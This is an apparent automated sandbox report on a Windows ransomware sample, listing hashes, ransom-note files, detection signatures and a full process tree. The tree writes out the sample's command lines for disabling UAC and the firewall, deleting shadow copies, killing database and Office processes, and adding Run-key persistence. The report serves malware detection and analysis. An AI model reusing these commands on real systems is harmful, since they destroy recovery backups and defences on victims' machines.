Analysis
  max time kernel: 150s
  max time network: 148s
  platform: windows7_x64
  resource: win7v20201028
  submitted: 01/04/2021, 09:52

Static task: static1

Behavioral task: behavioral1
  Sample: rcru_64.exe
  Resource: win7v20201028

Behavioral task: behavioral2
  Sample: rcru_64.exe
  Resource: win10v20201028

General
  Target: rcru_64.exe
  Size: 1.0MB
  MD5: 0d5d7377432ee449f30626c2371a0080
  SHA1: 56a1d1203d62c131b70837d75af79aa19a3b0487
  SHA256: 94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9
  SHA512: 19980615dbcba8ca8151aa5b93bc614b79edd1d77abbe37293001ecf16991cc939afca1cf62cac90c05510174cb8b7521a3074fbc160b47fd53d374521e06f0a

Malware Config
  Extracted: \??\c:\Read_Me!_.txt
  Extracted: C:\Users\Admin\Desktop\ReadMe_Now!.hta
Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Modifies Windows Firewall 1 TTPs

Modifies extensions of user files 3 IoCs
Ransomware generally changes the extension on encrypted files.
description | ioc | Process
File opened for modification | \??\c:\Users\Admin\Pictures\SendRedo.tiff | rcru_64.exe
File opened for modification | \??\c:\Users\Admin\Pictures\StepPush.tiff | rcru_64.exe
File opened for modification | \??\c:\Users\Admin\Pictures\UnpublishUnregister.tiff | rcru_64.exe

Drops startup file 4 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe | rcru_64.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe | rcru_64.exe
File created | \??\c:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt | rcru_64.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read-Me.hta | rcru_64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application 2 TTPs 4 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Updaters = "c:\\$Recycle.Bin\\RCRU_64.exe" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | reg.exe
Drops desktop.ini file(s) 19 IoCs
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Drops file in Program Files directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
1972 | vssadmin.exe

Kills process with taskkill 40 IoCs
Modifies Internet Explorer settings 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe

Modifies registry key 1 TTPs 3 IoCs
pid | Process
1976 | reg.exe
1188 | reg.exe
896 | reg.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes (indented entries are children of the process above them)

C:\Users\Admin\AppData\Local\Temp\rcru_64.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"
  - Modifies extensions of user files
  - Drops startup file
  - Drops desktop.ini file(s)
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID: 1152

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
    - Suspicious use of WriteProcessMemory
    PID: 2032

    C:\Windows\SysWOW64\reg.exe
      Command line: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      - Modifies registry key
      PID: 1976

    C:\Windows\SysWOW64\vssadmin.exe
      Command line: vssadmin.exe Delete Shadows /All /Quiet
      - Interacts with shadow copies
      PID: 1972

    C:\Windows\SysWOW64\Wbem\WMIC.exe
      Command line: wmic shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
      PID: 1772

    C:\Windows\SysWOW64\netsh.exe
      Command line: netsh advfirewall set currentprofile state off
      PID: 1764

    C:\Windows\SysWOW64\netsh.exe
      Command line: netsh firewall set opmode mode=disable
      PID: 916

    C:\Windows\SysWOW64\netsh.exe
      Command line: netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
      PID: 544

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
    - Suspicious use of WriteProcessMemory
    PID: 1108

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im notepad.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1224

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im msftesql.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1984

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im sqlagent.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1784

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im sqlbrowser.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1584

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im sqlservr.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1352

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im sqlwriter.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 976

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im oracle.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1764

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im ocssd.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1812

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im dbsnmp.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 304

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im synctime.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1624

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im agntsvc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 2008

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im mydesktopqos.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1896

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im isqlplussvc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1612

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im xfssvccon.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1456

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im mydesktopservice.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1056

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im ocautoupds.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 284

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im agntsvc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 916

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im encsvc.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1188

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im firefoxconfig.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1996

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im tbirdconfig.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1776

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im ocomm.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
      PID: 1716

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im mysqld.exe
      - Kills process with taskkill
      PID: 1616

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im mysqld-nt.exe
      - Kills process with taskkill
      PID: 664

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im mysqld-opt.exe
      - Kills process with taskkill
      PID: 804

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im dbeng50.exe
      - Kills process with taskkill
      PID: 468

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im sqbcoreservice.exe
      - Kills process with taskkill
      PID: 668

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im excel.exe
      - Kills process with taskkill
      PID: 1196

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im infopath.exe
      - Kills process with taskkill
      PID: 1224

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im msaccess.exe
      - Kills process with taskkill
      PID: 1984

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im mspub.exe
      - Kills process with taskkill
      PID: 1784

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im onenote.exe
      - Kills process with taskkill
      PID: 1692

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im outlook.exe
      - Kills process with taskkill
      PID: 1772

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im powerpnt.exe
      - Kills process with taskkill
      PID: 1380

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im steam.exe
      - Kills process with taskkill
      PID: 284

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im thebat.exe
      - Kills process with taskkill
      PID: 916

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im thebat64.exe
      - Kills process with taskkill
      PID: 556

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im thunderbird.exe
      - Kills process with taskkill
      PID: 296

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im visio.exe
      - Kills process with taskkill
      PID: 1304

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im winword.exe
      - Kills process with taskkill
      PID: 1584

    C:\Windows\SysWOW64\taskkill.exe
      Command line: taskkill /im wordpad.exe
      - Kills process with taskkill
      PID: 1456

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c echo %date%-%time%
    PID: 1056

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ver
    PID: 1352

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    PID: 612

    C:\Windows\SysWOW64\nslookup.exe
      Command line: nslookup myip.opendns.com. resolver1.opendns.com
      PID: 324

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
    PID: 1460

    C:\Windows\SysWOW64\reg.exe
      Command line: reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
      PID: 1060

    C:\Windows\SysWOW64\reg.exe
      Command line: reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
      - Modifies registry key
      PID: 1188

  C:\Windows\SysWOW64\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
    PID: 1968

    C:\Windows\SysWOW64\reg.exe
      Command line: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
      - Adds Run key to start application
      - Modifies registry key
      PID: 896

    C:\Windows\SysWOW64\reg.exe
      Command line: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
      - Adds Run key to start application
      PID: 1104

  C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ReadMe_Now!.hta"
    - Modifies Internet Explorer settings
    PID: 1204

  C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Documents and Settings\Admin\Desktop\ReadMe_Now!.hta"
    - Modifies Internet Explorer settings
    PID: 1724

C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  PID: 1316

C:\Windows\explorer.exe
  Command line: "C:\Windows\explorer.exe"
  PID: 960

C:\Windows\system32\AUDIODG.EXE
  Command line: C:\Windows\system32\AUDIODG.EXE 0x1c0
  PID: 1692

C:\Windows\system32\NOTEPAD.EXE
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Read_Me!_.txt
  PID: 860